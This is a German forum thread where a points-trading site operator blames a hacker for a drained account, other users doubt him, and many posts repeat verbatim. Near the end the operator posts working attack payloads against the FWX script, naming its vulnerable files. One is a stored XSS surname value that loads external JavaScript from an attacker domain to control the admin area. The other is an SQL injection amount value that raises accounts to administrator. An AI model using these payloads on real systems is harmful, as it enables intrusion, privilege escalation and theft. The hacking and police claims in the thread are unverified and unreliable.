Okay dann besprechen wir das am besten via ICQ denke ich..
Forum
Portal (2.806) · Forum (1.114)
Lose-Imperium.de/.com
- Ersteller YuriPrime
- Erstellt am
Okay dann besprechen wir das am besten via ICQ denke ich..
Darf ich mal erfahren warum meine Klammid bei Deiner Seite angemeldet ist? Ich bin schon seit über einem Jahr kein Zocker mehr *glaube ich* und ich habe mich bestimmt am 20.09.07 nicht bei dir um 17:40 angemeldet weil ich da gerade aus der Arbeit raus bin. Desweiteren habe ich mich mit Sicherheit heute nicht bei Deiner Seite eingeloggt. Also erkläre mir das mal bitte.
Btw.: Man bedenke das niemand meinen Klammaccount gehackt hat und sich so dort angemeldet hat, geschweige denn dorthin Lose transferiert hat, um den Rang Gold-Zocker zu erreichen, oder was meine Klammid dort sein soll.
In der Losetransferliste sieht man nix bei Klamm. Wenn du einen Hacker auf Deiner Seite hast solltest Du Dich mal darum kümmern und ich bitte Dich mich per PM auf dem laufenden zu halten.
Btw.: Man bedenke das niemand meinen Klammaccount gehackt hat und sich so dort angemeldet hat, geschweige denn dorthin Lose transferiert hat, um den Rang Gold-Zocker zu erreichen, oder was meine Klammid dort sein soll.
In der Losetransferliste sieht man nix bei Klamm. Wenn du einen Hacker auf Deiner Seite hast solltest Du Dich mal darum kümmern und ich bitte Dich mich per PM auf dem laufenden zu halten.
Moin, ja dies ist richtig!
Weiß nicht ob es der ein und selbe war/ist jedenfalls hat jemand unberechtigt zugriff auf meinen Server gehabt somit zugriff auf alles auch auf der Datenbank! Dort wurde alles umgestellt,einige Sachen geändert so das Fehlbuchung zustande kamen oder einfach mal jemand 9 MRD gutgeschriegen werden,plötzlich die Jackpots alle fallen,alle Globaljackpots weg, Werbebuchung bekommt man auch paar Milliarden für,solche dinge dies wurde nach und nach immer mehr! Bis der jenige Schließlich den kompletten Server lahm gelegt hat..
Da scheint es jemand auf mich abgesehn zu haben,anders kann ich mir das nicht erklären..er hat auch ich weiß nicht wie Transaktionen verschwinden lassen die von meiner Seite ausgingen..so das ich das nicht genau zurückverfolgen kann wo nun die lose sind,scheinbar hat der jenige sich kurz vor seiner Sperrung heut morgen auch im Losehandel rumgetrieben..
Ich warte nun das mein Hoster noch on kommt und mir da evtl mehr helfen kann.
Habe auch eine wiederherstellung durchgeführt nun dürfte alles normal wieder laufen die seite ist auch wieder Online!
Habe schon aus Angst die Verbindung zum EF weggenommen..
Werde sie nun wiederherstellen und Hoffe das alles Glatt geht..
Gruß Andy
H
Herby
Wenn etwas abgebucht worden ist und dies in einemr höheren Summe wo Du meinst das es NICHT angehen kann. So kann derjenige dies zwar in der DB verschwinden lassen aber nicht in der EF Transaktion da dieses IMMER aufzeichnet.
Da würde ich mal schauen
Sollte dieses sein so schnellstens Mone Info geben
MFG Herby
Da würde ich mal schauen
Sollte dieses sein so schnellstens Mone Info geben
MFG Herby
Wenn etwas abgebucht worden ist und dies in einemr höheren Summe wo Du meinst das es NICHT angehen kann. So kann derjenige dies zwar in der DB verschwinden lassen aber nicht in der EF Transaktion da dieses IMMER aufzeichnet.
Da würde ich mal schauen
Sollte dieses sein so schnellstens Mone Info geben
MFG Herby
Der Witz an der Sache ist,selbst die Transaktion bei Klamm ist nicht zu sehn!
bzw. sie ist verschwunden! Allerdings ist das BKA und auch die Polizei gerade dabei diesen Typen ausfindig zu machen,da er auf mehreren Seiten wohl versucht hat so wie bei mir,vor einiger zeit ca. 2 Wochen war schon etwas auffäliges als mir User sagten das Plötzlich der Amdinbereich zu sehen sei aber diese nur beim Überblick zugriff hatten,und es immer wieder zwischen durch zu irgendwelchen Fehlern kam die unerklärlich waren,dieser jemand muss damit zutun gehabt haben! Jedenfalls hatte er letzte Nacht zugriff auf der DB und konnte nach belieben alles ändern,genau die gleichen Sachen wie sie bei mir waren sind sie vorher auch bei einer anderen Seite passiert! Jeder betreiber sollte also im moment noch acht geben solang der Typ nicht gefunden wurde,was aber denke ich nicht mehr lange dauern wird!
Er hat ja auch im Forum einige Leute anscheind vorher schon beschissen um einige Sachen,hat auch falsche angaben gemacht mit diversen sachen..
Einige Lose die von anderen User ausgezahlt worden sind durch Fehler werd ich wie es ausschaut teilweise zumindest wieder bekommen!
Selbst Klamm ist vor diesen Nicht sicher,wer weiß wieviel lose er sich schon illegal beschafft hat,da er zugriff auf mehrere seiten hat und er sich beliebig viel lose gutschreiben kann,selbst wenn er jeden tag nur 3-4mio auszahlt das auf mehreren seiten sowas fällt nich tdirekt auf aber imm allgemeinen würde er damit viel gewinn machen..
Das FWX scheint im allgemeinen auch noch nicht ganz so sicher zu sein..
Mfg Andy
Der einzige Witz dazu ist ja wohl dein Posting - der einzige der bei Klamm selbst was verschwinden lassen kann ist Lukas vielleicht noch Mone oder Kay
bei 20 Mrd in 3 Wochen fällt das selbst dem blindesten Webmaster auf !
Öhm,es ist bereits bekannt das es ein Hacker ist! Er hat das nicht nur bei mir gemacht auch auf anderen Seiten.. Er besitzt auch ein Schweizer Konto wo er sich immer alles drauf auzahlen lässt,das BKA wird diesen Typen ausfindig machen auch wenn er über Proxy Online ist! Es ist nur eine Frage der Zeit..
Heute Nacht ist alles verschwunden einiges wurde ausgezahlt,der Rest ist weg! Würde dich mal sehn wenn man dir den ganzen EF Leer räumt! Der User ist nicht ohne Grund gesperrt weil er auch so schon betrogen hat..
Erst nachdenken dann schreiben..
Fakt ist das er sich überall ein hackt!
Wie kommst du eigendlich auf 3 wochen? Was war in 3 wochen??
Davon war gar nicht die Rede..
ganz einfach so lange gibts deine Seite erst !
Lass den Spaß mit dem BKA ich bezweifle das da auch nur 1 % Wahrheit dran ist
Kein seriöser Webbi hat das komplette Userguthaben offen auf dem EF liegen
mich würde mal interessieren was Mone dazu sagt und wo Ihrer Meinung nach deine ominös verschwundenen Mrd hin sind - sie kann das mit Sicherheit nachvollziehen !
Lass den Spaß mit dem BKA ich bezweifle das da auch nur 1 % Wahrheit dran ist
Kein seriöser Webbi hat das komplette Userguthaben offen auf dem EF liegen
mich würde mal interessieren was Mone dazu sagt und wo Ihrer Meinung nach deine ominös verschwundenen Mrd hin sind - sie kann das mit Sicherheit nachvollziehen !
H
Herby
Also auch wenn Er sich bei Dir eingeloggt hat so kann Er bei KLAMM niemals etwas verschwinden lassen der Er keinen Zugriff auf den EF hatte um dort Transaktionen verschwinden zu lassen.
Das kann glaube ich nichtmal Mone oder Kay da die keinen Zugriff darauf haben.
Also wenn ich sehe was auf meinen EF los ist dann handel ich auch ganz schnell
Das kann glaube ich nichtmal Mone oder Kay da die keinen Zugriff darauf haben.
Also wenn ich sehe was auf meinen EF los ist dann handel ich auch ganz schnell
Also auch wenn Er sich bei Dir eingeloggt hat so kann Er bei KLAMM niemals etwas verschwinden lassen der Er keinen Zugriff auf den EF hatte um dort Transaktionen verschwinden zu lassen.
Das kann glaube ich nichtmal Mone oder Kay da die keinen Zugriff darauf haben.
Also wenn ich sehe was auf meinen EF los ist dann handel ich auch ganz schnell
Das habe ich ja das ist mitten in der Nacht passiert kurz nachdem ich offline ware..es ist halt so das mir nun viele lose fehlen hab nur noch das was halt im Tresor war.. der Rest ist weg! Es ist halt so das ein hacker drauf zugriff genommen hat..und dieser wird gefunden werden! Dann werden wir ja sehn..
ich weiß nicht wie er das gemacht hat,aber er hat es gemacht!
hm das kommt mir alles sehr bekannt vor, beim Start unserer Seite wurde der global angehoben. einmal geholt mit 600 mio und einmal stand er auf 4 milliarden. gott sei dank haben wir es noch gemerkt. und das alles innerhalb von 3 stunden.
erst am samstag wurde von unserem EF 100 mio abgehoben obwohl der user 0 aps hatte und nichts eingezahlt hatte, meldung bei mone hat nur gebracht das sie uns sagte das die lose bereits ausgegeben wurden. nach langem hin und her haben wir die lose von ihm wiederbekommen, da hatte sich jemand über den account des users bei uns reingehackt.
also im moment ist vorsicht geboten
ich weiß von mehreren seiten das der server dort auch vor kurzem gehackt wurde
erst am samstag wurde von unserem EF 100 mio abgehoben obwohl der user 0 aps hatte und nichts eingezahlt hatte, meldung bei mone hat nur gebracht das sie uns sagte das die lose bereits ausgegeben wurden. nach langem hin und her haben wir die lose von ihm wiederbekommen, da hatte sich jemand über den account des users bei uns reingehackt.
also im moment ist vorsicht geboten
ich weiß von mehreren seiten das der server dort auch vor kurzem gehackt wurde
Genau..so wie ich eigendlich das auf meiner Seite auch nur kann oder?
Kann auch nur ich oder mein Co Transaktionen verschwinden lassen,oder halt wenn jemand anderes drauf zugriff hat und löscht diese!
Das ist genau in dem Fall auch passiert,allerdings anscheinden auch bei Klamm! Der hat ziemlich viel rum mannipuliert,ist einiges fehlerhaft gelaufen von der einen auf der anderen minute wurden es anscheind immer mehr probleme weil er alles am umstellen war! Die Restlichen User Transaktionen sind wohl noch alle drin,was genau nun fehlt weiß ich nicht..jedenfalls fehlt einiges nun..
Der einzigste der sich aufregen kann bin ich,
werde nun auch mal Mone eben antickern da dies lieber intern geklärt wird bevor hier einige noch den Spieß umdrehen und glauben ich zieh mir selbst lose ab^^ swoeit kommts noch davon gibts einige user die das gern versuchen
Mfg Andy
H
Herby
Genau das meine ich ja auch damit.
Nichts kann verschwinden was nicht über den EF aufgezeichnet wird
Genau das meine ich ja auch damit.
Nichts kann verschwinden was nicht über den EF aufgezeichnet wird
genau, und wenn es diesen hacker wirklich gibt, muss es bei den transaktionen aufgelistet werden, dass sich jemand klamm hackt und dann die transaktionen löscht, halte ich für sehr unwahrschenlich
mfg jojo2351
H
Herby
Richtig denn nicht umsonst werden min 30 Tage aufgezeichnet ( halt zur Sicherheit )
normalerweise sollte sowas auch aufgelistet sein, bei mir hat sich der Hacker mit einem anderen account reingehackt durch seine transaktionen konnten wir feststellen das die lose in wechselstuben eingezahlt wurden.
Hier mal ein paar Tips für die Klugscheisser unter euch 
Ihr habt gar keine Ahnung was alles möglich ist, Profis hinterlassen keine Spuren,auch nicht in der Transaktionsliste!!
Also lest und lernt für die,die nicht checken was H.A.C.K.E.R bedeutet..
Nur an die jenigen hier gerichtet die Müll schreiben^^
Also für euch mit kurzanleitung :
Auf Grund der nicht vorhanden Überprüfung der Eingaben bei der Registrierung ist es möglich Vornamen, Nachnamen, sowie eine komplette Adresse bei der Registrierung anzugeben, die HTML-Tags enthält. Auf dieser Grundlage lässt sich ein externes Javascript einbinden, welches der Admin beim Editieren des Users im Adminbereich ausführt.
fehlerhafter Programmcode: Der anfällige Code verbirgt sich in der PHP-Datei "anmeldung.php".
potentieller Angriff:
Als Nachname wird angegeben: Mustermann' size='30'><script language="JavaScript" src="https://www.boese_domain.de/ajax.js"></script><input type='hidden' name='muh
In dem Beispiel oben würde der Cracker ein Ajax-Script einbinden, welches ihm bei Aufruf durch den Admin >>> ermöglicht den kompletten Adminbereich <<< fernzusteuern.
----------------------------------------------------------------------
2. MySQL Injektion :
Kurzbeschreibung: Durch die nicht vorhandene Absicherung der Menge im Überweisungs-Aufruf der Überweisung von User zu User im FWX ist es möglich, den eigenen und den Empfänger-Account zum Administrator heraufzustufen.
fehlerhafter Programmcode: Der anfällige Code verbirgt sich in der PHP-Datei "mods\bank.inc.php" und beginnt etwa ab Zeile 119.
Ein String der Form "123 abcdefgh" besteht die kleiner-als-Prüfung problemlos.
potentieller Angriff:
Als Menge wird im Formular folgendes definiert: 1000, u_rights=15
In dem Beispiel oben würde der Cracker sich selbst und den Empfänger der Transaktion zum Administrator des Skriptes machen.
Ihr habt gar keine Ahnung was alles möglich ist, Profis hinterlassen keine Spuren,auch nicht in der Transaktionsliste!!
Also lest und lernt für die,die nicht checken was H.A.C.K.E.R bedeutet..
Nur an die jenigen hier gerichtet die Müll schreiben^^
Also für euch mit kurzanleitung :
Auf Grund der nicht vorhanden Überprüfung der Eingaben bei der Registrierung ist es möglich Vornamen, Nachnamen, sowie eine komplette Adresse bei der Registrierung anzugeben, die HTML-Tags enthält. Auf dieser Grundlage lässt sich ein externes Javascript einbinden, welches der Admin beim Editieren des Users im Adminbereich ausführt.
fehlerhafter Programmcode: Der anfällige Code verbirgt sich in der PHP-Datei "anmeldung.php".
potentieller Angriff:
Als Nachname wird angegeben: Mustermann' size='30'><script language="JavaScript" src="https://www.boese_domain.de/ajax.js"></script><input type='hidden' name='muh
In dem Beispiel oben würde der Cracker ein Ajax-Script einbinden, welches ihm bei Aufruf durch den Admin >>> ermöglicht den kompletten Adminbereich <<< fernzusteuern.
----------------------------------------------------------------------
2. MySQL Injektion :
Kurzbeschreibung: Durch die nicht vorhandene Absicherung der Menge im Überweisungs-Aufruf der Überweisung von User zu User im FWX ist es möglich, den eigenen und den Empfänger-Account zum Administrator heraufzustufen.
fehlerhafter Programmcode: Der anfällige Code verbirgt sich in der PHP-Datei "mods\bank.inc.php" und beginnt etwa ab Zeile 119.
Ein String der Form "123 abcdefgh" besteht die kleiner-als-Prüfung problemlos.
potentieller Angriff:
Als Menge wird im Formular folgendes definiert: 1000, u_rights=15
In dem Beispiel oben würde der Cracker sich selbst und den Empfänger der Transaktion zum Administrator des Skriptes machen.
